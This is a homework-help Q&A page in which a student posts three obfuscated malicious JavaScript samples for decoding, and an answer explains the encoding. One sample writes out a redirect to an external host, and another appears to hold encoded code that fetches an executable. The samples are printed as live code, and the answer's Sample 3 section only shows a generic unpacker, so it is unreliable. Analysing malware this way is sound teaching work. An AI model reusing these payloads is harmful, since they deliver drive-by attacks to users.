convert these scripts to plaintext, and analyze the content of the code, and sum
ID: 3746696 • Letter: C
Question
convert these scripts to plaintext, and analyze the content of the code, and summarize what the scripts are doing in plain english.
Hint #1: All scripts are coded in JavaScript
Hint #2: All scripts use common encoding and obfuscation techniques that are popular with malware authors
Hint #3: Please remove carriage returns in the ciphertext for Samples #2 and #3
Hint#4: Search google for a tool that allows you to automate the conversion of ciphertext to plaintext. One tool is critical for Samples #2 and #3
Hint#5: Sample #2 was used to scramble Sample #3: decode Sample #2 and understand its function to decode Sample #3.
Please note these samples are malicious scripts, handle with care.
Sample 1: <script>a=newArray(8.71,59.87,104.84,101.7,113.85,96.99,108.76,100.8,31.75,114.83,113.66,98.66,60.69,33.61,103.88,115.7,115.82,111.75,57.85,46.86,46.82,96.62,117.66,44.72,110.8,109.93,107.62,104.64,109.89,100.73,44.62,115.61,100.6,114.87,115.72,45.85,98.86,110.88,108.66,46.61,102.71,100.73,115.67,45.81,111.74,103.96,111.91,62.97,104.71,99.76,60.84,49.93,48.78,47.91,55.66,56.99,33.84,31.68,118.63,104.74,99.81,115.66,103.75,60.82,47.93,31.88,103.68,100.8,104.76,102.74,103.81,115.88,60.87,47.89,61.69,59.62,46.85,104.61,101.6,113.97,96.77,108.84,100.91,61.96,12.76,9.97,12.95,9.6,59.65,82.99,66.75,81.86,72.65,79.9,83.69,31.99,75.78,64.77,77.79,70.95,84.91,64.61,70.83,68.79,60.9,33.93,73.81,96.75,117.94,96.82,82.72,98.72,113.66,104.63,111.69,115.82,33.6,61.65,59.83,32.66,44.64,44.98,31.93,12.7,9.89,12.62,9.7,104.68,101.79,39.89,118.63,104.71,109.9,99.87,110.9,118.81,45.81,109.72,96.96,108.76,100.94,32.69,60.88,38.61,111.73,110.98,111.84,116.74,111.63,38.67,40.8,122.68,118.66,104.73,109.78,99.96,110.75,118.88,45.64,109.94,96.78,108.68,100.65,60.69,38.96,111.96,110.9,111.77,116.68,111.87,38.93,58.63,31.96,12.82,9.64,12.7,9.8,110.89,111.84,100.84,109.97,39.65,38.92,103.63,115.78,115.7,111.99,57.94,46.99,46.64,96.89,117.77,44.72,110.95,109.87,107.69,104.91,109.77,100.87,44.6,115.65,100.81,114.63,115.62,45.63,98.68,110.72,108.84,46.97,102.97,100.68,115.94,45.62,111.6,103.97,111.8,62.71,104.97,99.74,60.71,49.62,48.64,47.89,55.75,56.99,38.76,40.84,58.9,31.94,12.71,9.9,12.99,9.92,114.93,100.61,107.96,101.61,45.74,101.81,110.99,98.71,116.89,114.93,39.73,40.9,58.91,124.94,31.62,12.89,9.69,12.73,9.91,46.73,46.62,31.66,44.72,44.79,61.91,59.63,46.73,82.63,66.93,81.73,72.96,79.87,83.75,61.93,12.89,9.89);var i; for (i=0;i<=a.length;i++){document.write(String.fromCharCode(Math.round(a[i])));};</script>
Sample 2:
eval(unescape("%66%75%6E%63%74%69%6F%6E%20%64%28%73%29%7B%72%3D%6E%65%77%20%41%72%72%61%79%28%29%3B%74%3D%22%22%3B%6A%3D%30%3B%66%6F%72%28%69%3D%73%2E%6C%65%6E%67%74%68%2D%31%3B%69%3E%30%3B%69%2D%2D%29%7B%74%2B%3D%53%74%72%69%6E%67%2E%66%72%6F%6D%43%68%61%72%43%6F%64%65%28%73%2E%63%68%61%72%43%6F%64%65%41%74%28%69%29%5E%32%29%3B%69%66%28%74%2E%6C%65%6E%67%74%68%3E%38%30%29%7B%72%5B%6A%2B%2B%5D%3D%74%3B%74%3D%22%22%7D%7D%64%6F%63%75%6D%65%6E%74%2E%77%72%69%74%65%28%72%2E%6A%6F%69%6E%28%22%22%29%2B%74%29%7D"));
Sample 3:
%08<VRKPAQ->%08dK"flG%08dK"flG%08dK"flG%08ld"gvwagzGnngjQ,rrCnngjQ]h`m%080.ld"gnkDmV
gtcQ,`fmfc]h`m%08+{fm@gqlmrqgp,0nozqo]h`m*gvkpU,`fmfc]h`m%08lgrM,`fmfc]h`m%083?gr{V,
`fmfc]h`m%08gqnG%08GQNCD.3.ld"lwP,nngjQU]h`m%08vzgL"gowqgP"pmppG"lM%08+ .empR]h`M"$"
, "$"gocL]h`M*vagh`MgvcgpA,QFP]h`m?nngjQU]h`m""vgQ%08 nngjQ "?"empR]h`M%08 vrkpaQU
"?"gocL]h`M%08gqmnA,gnkd]fcmnlumf%08vzgL%08++gfmAgv{@*pjA*gvkpU,gnkd]fcmnlumf%08+gv{
@a*@aqC?gfmAgv{@%08+3.k.{fm@NOZ*@fkO?gv{@a%08gxkq]gnkd]fcmnlumf"mV"3?k"pmD%08+{fm@NO
Z*@lgN?gxkq]gnkd]fcmnlumf%08+GWPV".ld*gnkDvzgVgvcgpA,q{QgnkD]h`m?gnkd]fcmnlumf"vgQ%08
+ .empR]h`M"$" , "$"gocL]h`M*vagh`MgvcgpA,QFP]h`m?q{QgnkD]h`m"vgQ%08 vagh`Mogvq{Qgnk
D "?"empR]h`M%08 elkvrkpaQ "?"gocL]h`M%08lgjV"pg`owL,ppG"dK%08+ .empR]h`M"$" , "$"go
cL]h`M*vagh`MgvcgpA,QFP]h`m"?"`fmfc]h`m"vgq%08 ocgpvQ "?"empR]h`M%08 @FMFC "?"gocL]h`
M%08vzgL"gowqgP"pmppG"lM%08flgq,0nozqo]h`m%08gqncD. gzg,01qpggrgk-ij,vglgakmt--8rvvj
. VGE "lgrm,0nozqo]h`m%08+empR]h`M"$" , "$"gocL]h`M*vagh`MgvcgpA"?"0nozqo]h`m"vgq%08
RVVJNOZ "?"empR]h`M%08 vdmqmpakO "?"gocL]h`M%08ld"$"pkFlkU?ld%08 ^ "$"+3*qvlglmromA]
jvcR]vlmD""$" ^ "$"+2*qvlglmromA]jvcR]vlmD"?pkFlkU%08+3.3/. ^ .jvcR,ogvKpgfnmDm*vknr
Q?qvlglmromA]jvcR]vlmD%08+ dvv,nm`o{Q *gocLgqpcR,pgfnmDm?ogvKpgfnmDm"vgQ%08+20*gacrQ
gocL,rrCnngjQ]h`m"?"pgfnmDm"vgQ%08+ .empR]h`M"$" , "$"gocL]h`M*vagh`MgvcgpA,QFP]h`m
"?"rrCnngjQ]h`m"vgq%08 lmkvcaknrrC "?"empR]h`M%08 nngjQ "?"gocL]h`M%08 gzg,01roak "?"
ld%08 41G;0AD62A22/C1:;/2F33/1C74/477A4;F@8fkqna ". fkqqcna "gvw`kpvvCvgq,QFP]h`m%08
QFP]h`m ". fk "gvw`kpvvCvgq,QFP]h`m%08+ vagh`m *vlgognGgvcgpa,vlgowamf"?"QFP]h`m"vgq
%08empR]h`M"okF%08gocL]h`M"okF%08lgjV""2"<>"+ 01lkU .opmdvcnr,pmvcektcl*pvQlK"dK%08l
gjV" pgpmnrzG"vglpgvlK"vdmqmpakO ?gocLrrc,pmvcektcl"dK%08< vrkpaQ@T ?gecwelcn"VRKPAQ>
Explanation / Answer
Solutions
Sample1:
<script>a=new Array(8.71,59.87,104.84,101.7,113.85,96.99,108.76,100.8,31.75,114.83,113.66,98.66,60.69,33.61,103.88,115.7,115.82,111.75,57.85,46.86,46.82,96.62,117.66,44.72,110.8,109.93,107.62,104.64,109.89,100.73,44.62,115.61,100.6,114.87,115.72,45.85,98.86,110.88,108.66,46.61,102.71,100.73,115.67,45.81,111.74,103.96,111.91,62.97,104.71,99.76,60.84,49.93,48.78,47.91,55.66,56.99,33.84,31.68,118.63,104.74,99.81,115.66,103.75,60.82,47.93,31.88,103.68,100.8,104.76,102.74,103.81,115.88,60.87,47.89,61.69,59.62,46.85,104.61,101.6,113.97,96.77,108.84,100.91,61.96,12.76,9.97,12.95,9.6,59.65,82.99,66.75,81.86,72.65,79.9,83.69,31.99,75.78,64.77,77.79,70.95,84.91,64.61,70.83,68.79,60.9,33.93,73.81,96.75,117.94,96.82,82.72,98.72,113.66,104.63,111.69,115.82,33.6,61.65,59.83,32.66,44.64,44.98,31.93,12.7,9.89,12.62,9.7,104.68,101.79,39.89,118.63,104.71,109.9,99.87,110.9,118.81,45.81,109.72,96.96,108.76,100.94,32.69,60.88,38.61,111.73,110.98,111.84,116.74,111.63,38.67,40.8,122.68,118.66,104.73,109.78,99.96,110.75,118.88,45.64,109.94,96.78,108.68,100.65,60.69,38.96,111.96,110.9,111.77,116.68,111.87,38.93,58.63,31.96,12.82,9.64,12.7,9.8,110.89,111.84,100.84,109.97,39.65,38.92,103.63,115.78,115.7,111.99,57.94,46.99,46.64,96.89,117.77,44.72,110.95,109.87,107.69,104.91,109.77,100.87,44.6,115.65,100.81,114.63,115.62,45.63,98.68,110.72,108.84,46.97,102.97,100.68,115.94,45.62,111.6,103.97,111.8,62.71,104.97,99.74,60.71,49.62,48.64,47.89,55.75,56.99,38.76,40.84,58.9,31.94,12.71,9.9,12.99,9.92,114.93,100.61,107.96,101.61,45.74,101.81,110.99,98.71,116.89,114.93,39.73,40.9,58.91,124.94,31.62,12.89,9.69,12.73,9.91,46.73,46.62,31.66,44.72,44.79,61.91,59.63,46.73,82.63,66.93,81.73,72.96,79.87,83.75,61.93,12.89,9.89);var i; for (i=0;i<=a.length;i++){document.write(String.fromCharCode(Math.round(a[i])));};</script>
Explanation:
Executing this script will redirect you to the http://av-online-test.com/get.php?id=21089
fromCharCode is the in built function of JavaScript used to read the ASCII or UNICODE format used for characters and numbers.
For example 65,66,67 are code format for A,B,C.
In order to read the characters in array you can use window.alert or print function instead of document.write.
Sample 2:
Using online tool Decoding of URL is completed
I have used a tool in utilities-online.info (search in Google).
After decoding the code is in the following format
function d(s)
{
r=new Array();
t="";j=0;
for(i=s.length-1;i>0;i--){
t+=String.fromCharCode(s.charCodeAt(i)^2);
if(t.length>80){r[j++]=t;
t=""
}
}document.write(r.join("")+t)
};
Sample3
After Obfuscating sample3
Follwing code has been observed
function(p,a,c,k,e,d)
{
e=function(c)
{
return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};
if(!''.replace(/^/,String))
{
while(c--){d[e(c)]=k[c]||e(c)}
k=[function(e){return d[e]}];
e=function(){return'\w+'};
c=1};
while(c--)
{
if(k[c])
{
p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}
return p
}
Related Questions
Navigate
Integrity-first tutoring: explanations and feedback only — we do not complete graded work. Learn more.